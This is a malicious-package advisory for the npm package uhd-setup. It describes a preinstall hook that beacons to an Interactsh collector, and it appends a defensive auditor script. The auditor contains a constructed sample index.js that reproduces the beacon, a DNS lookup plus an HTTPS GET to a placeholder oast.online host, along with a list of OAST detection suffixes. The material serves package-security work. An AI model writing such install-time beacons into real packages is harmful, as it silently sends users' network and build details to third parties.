MAL-2026-5287
Malicious code in uhd-setup (npm)
Details
--- _-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (8cd16b0b6896b16874da441b7197b846bf0c725dcff0ef2d6e8f93c6cc08fc99)

package.json declares `scripts.preinstall: node index.js`. On `npm install`, index.js (lines 4-5) performs `dns.resolve` and `https.get` against `<id>.d8hiivedv3ok8hrng5eghchyw4hwsioaz.oast.online`, an Interactsh OAST collector. The request fires unconditionally with no opt-out, leaking the installer's egress IP, internal DNS resolver identity, and fact-of-install (with the package id encoded in the subdomain and URL path) to a third-party-controlled endpoint. The README frames this as authorized dependency-confusion research targeting Ubiquiti, but the beacon does not gate on any organizational identifier — any installer that pulls this name (typo, internal-name collision, automated mirror) sends build-system metadata to the researcher. Trigger is the preinstall lifecycle hook, so the network call fires before any code review opportunity.
## Source: ossf-package-analysis (358eee34aaba61eaa93e977d35a18f35f59a56527d7c20b6e9a0bdf9c4a0a8da)

The OpenSSF Package Analysis project identified 'uhd-setup' @ 99.0.0 (npm) as malicious.
It is considered malicious because:
- The package communicates with a domain associated with malicious activity.
Affected packages
No fixed version published yet for uhd-setup (npm). Pin to a known-safe version or switch to an alternative.
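
The install-time pattern described in the amazon-inspector finding can be checked for before a package is admitted to a build. The following is an added example, not code from this advisory or from either source: it audits an unpacked package for install lifecycle hooks whose target script makes network calls. The function name, severity labels, sample package and placeholder host are assumptions, and every suffix other than `oast.online` is an assumed, non-exhaustive list.

```javascript
// Added example (not from the advisory): audit an unpacked npm package for
// install-time hooks whose target script makes network calls.

// Lifecycle scripts npm runs automatically on `npm install`.
const INSTALL_HOOKS = ["preinstall", "install", "postinstall"];
// Call sites to flag: the two named in the finding plus close relatives (assumed list).
const NETWORK_CALLS = /\b(?:dns\.(?:resolve\w*|lookup)|https?\.(?:get|request)|fetch)\s*\(/g;
// OAST collector suffixes: oast.online is from the advisory, the rest are an
// assumed, non-exhaustive list of other public Interactsh domains.
const OAST_SUFFIXES = ["oast.online", "oast.fun", "oast.pro", "oast.live", "oast.site", "oast.me"];

// manifest: parsed package.json; files: map of relative path -> source text.
function auditInstallHooks(manifest, files) {
  const findings = [];
  for (const hook of INSTALL_HOOKS) {
    const cmd = (manifest.scripts || {})[hook];
    if (typeof cmd !== "string") continue;
    // Resolve `node <file>` to the script the hook executes.
    const m = cmd.match(/\bnode\s+([^\s;&|]+)/);
    const file = m ? m[1].replace(/^\.\//, "") : null;
    const src = file !== null ? files[file] : undefined;
    if (typeof src !== "string") {
      // Hook runs something we could not read: never treat that as clean.
      findings.push({ hook, cmd, file, calls: [], oast: [], severity: "review" });
      continue;
    }
    const hits = src.match(NETWORK_CALLS) || [];
    const calls = [...new Set(hits.map((c) => c.replace(/\s*\($/, "")))];
    const oast = OAST_SUFFIXES.filter((s) => src.includes("." + s));
    const severity = oast.length ? "block" : calls.length ? "review" : "info";
    findings.push({ hook, cmd, file, calls, oast, severity });
  }
  return findings;
}

// Constructed sample mirroring the pattern in the advisory (placeholder host).
const SAMPLE_MANIFEST = { name: "example-pkg", version: "99.0.0", scripts: { preinstall: "node index.js" } };
const SAMPLE_FILES = {
  "index.js": [
    'const dns = require("dns"), https = require("https");',
    'const host = "example-pkg.placeholder-id.oast.online";',
    "dns.resolve(host, () => {});",
    'https.get("https://" + host + "/example-pkg");',
  ].join("\n"),
};

function auditSample() { return auditInstallHooks(SAMPLE_MANIFEST, SAMPLE_FILES); }
console.log(JSON.stringify(auditSample(), null, 2));
```

Running installs with `npm install --ignore-scripts` keeps lifecycle hooks from executing while a package is under review.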